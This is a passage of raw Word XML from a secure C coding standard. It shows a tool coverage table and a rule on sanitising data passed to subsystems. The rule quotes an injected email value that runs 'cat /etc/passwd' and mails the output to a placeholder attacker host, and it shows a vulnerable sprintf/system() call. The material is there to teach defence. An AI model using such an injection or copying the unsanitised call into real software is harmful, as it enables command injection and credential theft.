            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48881E63" w14:textId="60487B5D" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290299C7" w14:textId="57B19120" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>489, 1776</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63D22AA7" w14:textId="52195982" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="2263A6BD" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A2B619" w14:textId="318BA4BF" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId56" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6730C827" w14:textId="553C0907" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557B6FBC" w14:textId="7B3342FB" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId57" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C: Rule STR30-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="789D9788" w14:textId="77777777" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Checks for writing to const qualified object (rule fully covered)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7A6AE4" w14:textId="77777777" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="4182A25A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3AC882" w14:textId="50CB4274" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId58" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PVS-Studio</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2B0DDA" w14:textId="20C13455" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17BF29E2" w14:textId="2F0172B4" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId59" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V675</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BB673BC" w14:textId="77777777" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="21077E8E" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D17B6B" w14:textId="65717D0A" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId60" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>RuleChecker</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A788F9D" w14:textId="46AF826F" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E2A4868" w14:textId="669933AF" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>string-literal-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>modfication</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6728BDD5" w14:textId="00A825C8" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="2F58D832" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378ECFD3" w14:textId="0E8514A7" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId61" w:history="1">
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Splint</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC79B01" w14:textId="24E2B4C3" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10926EE6" w14:textId="283D52CA" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB53902" w14:textId="539DE0D4" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5201D" w14:paraId="4771F374" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6AC12A" w14:textId="71B86BDF" w:rsidR="00D5201D" w:rsidRDefault="00000000" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId62" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>TrustInSoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00D5201D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Analyzer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608161A4" w14:textId="225A4BDA" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E8BB44E" w14:textId="52D8C79B" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>mem_access</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30910B79" w14:textId="6358FA0F" w:rsidR="00D5201D" w:rsidRDefault="00D5201D" w:rsidP="00D5201D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Exhaustively verified (see </w:t>
            </w:r>
            <w:hyperlink r:id="rId63"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6" w:name="_Toc52464062"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="4A43CDC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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12C9A6C2" w14:textId="681AAA7B" w:rsidR="00381847" w:rsidRDefault="00B06FD6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>STR</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>002</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D0F26FC" w14:textId="3E64ECA2" w:rsidR="00381847" w:rsidRDefault="009E33DE" w:rsidP="00054428">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="5220"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="009E33DE">
              <w:t>Sanitize data passed to complex subsystems</w:t>
            </w:r>
            <w:r w:rsidR="0080298D">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00054428" w:rsidRPr="00054428">
              <w:t>String data passed to complex subsystems may contain special characters that can trigger commands or actions, resulting in a software vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="194F6BA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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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FA0DCD" w14:textId="77777777" w:rsidR="00F72634" w:rsidRDefault="00DD349E" w:rsidP="00A72503">
            <w:r w:rsidRPr="00DD349E">
              <w:t xml:space="preserve">Data sanitization requires an understanding of the data being passed and the capabilities of the subsystem. John Viega and Matt Messier provide an example of an application that inputs an email address to a buffer and then uses this string as an argument in a call to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DD349E">
              <w:t>system(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DD349E">
              <w:t>) [Viega 2003]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5470C318" w14:textId="77777777" w:rsidR="009549EC" w:rsidRDefault="009549EC" w:rsidP="009549EC">
            <w:r>
              <w:t>The risk, of course, is that the user enters the following string as an email address:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F953FA" w14:textId="77777777" w:rsidR="009549EC" w:rsidRDefault="009549EC" w:rsidP="009549EC"/>
          <w:p w14:paraId="70470021" w14:textId="6C1752A4" w:rsidR="009549EC" w:rsidRDefault="009549EC" w:rsidP="009549EC">
            <w:r>
              <w:t>bogus@addr.com; cat /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>passwd  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> mail some@badguy.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="555F1178" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B66128B" w14:textId="77777777" w:rsidR="00DD349E" w:rsidRDefault="00DD349E" w:rsidP="00DD349E">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>sprintf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>buffer, "/bin/mail %s &lt; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">/email", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>addr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE2AEF7" w14:textId="65E21A23" w:rsidR="00F72634" w:rsidRDefault="00DD349E" w:rsidP="00DD349E">
            <w:r>
              <w:t>system(buffer);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B2E1D5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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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E262E3" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>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2DF89AB3" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D"/>
          <w:p w14:paraId="457B7890" w14:textId="35537EA6" w:rsidR="00F72634" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>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t>tcp_wrappers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> package written by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Wietse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Venema, shows the whitelisting approach:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="270FEC8A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6EAED03A" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">static char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ok_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>chars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>] = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43772EEA" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">                         "ABCDEFGHIJKLMNOPQRSTUVWXYZ"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E4FABF0" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">                         "1234567890_-.@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6183E35D" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>user_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>] = "Bad char 1:} Bad char 2:{";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BB64413" w14:textId="77777777" w:rsidR="00612C9D" w:rsidRDefault="00612C9D" w:rsidP="00612C9D">
            <w:r>
              <w:t xml:space="preserve">char *cp = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>user_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
